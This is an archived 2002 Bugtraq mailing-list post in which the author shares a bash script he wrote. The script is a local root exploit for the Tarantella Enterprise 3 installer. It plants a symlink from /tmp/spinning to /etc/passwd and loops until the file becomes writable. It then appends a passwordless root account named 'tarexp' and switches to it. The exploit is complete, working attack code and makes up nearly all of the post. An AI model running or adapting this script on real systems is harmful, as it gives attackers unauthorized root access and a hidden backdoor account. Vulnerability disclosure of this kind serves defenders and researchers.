8056500 2002-02-24 08:59 -0500  /36 rader/ Larry W. Cashdollar <lwc@vapid.dhs.org>
Sänt av: joel@lysator.liu.se
Importerad: 2002-02-26  01:31  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vuldb@securityfocus.com
Mottagare: Bugtraq (import) <21133>
Ärende: Exploit for Tarantella Enterprise installation (bid  4115)
------------------------------------------------------------
From: "Larry W. Cashdollar" <lwc@vapid.dhs.org>
To: <bugtraq@securityfocus.com>
Cc: <vuldb@securityfocus.com>
Message-ID: <20020224085517.C9867-100000@vapid.dhs.org>


Had some idle time and wrote this, tested under Linux.



#!/bin/bash
#Larry W. Cashdollar  lwc@vapid.dhs.org
#http://vapid.dhs.org
#Tarantella Enterprise 3 symlink local root Installation exploit
#For educational purposes only.
#tested on Linux.  run and wait.


echo "Creating symlink."

/bin/ln -s /etc/passwd /tmp/spinning

echo "Waiting for tarantella installation."

while true
do
echo -n .
if [ -w /etc/passwd ]
then
	echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
        su - tarexp
        exit
fi
done
(8056500) /Larry W. Cashdollar <lwc@vapid.dhs.org>/-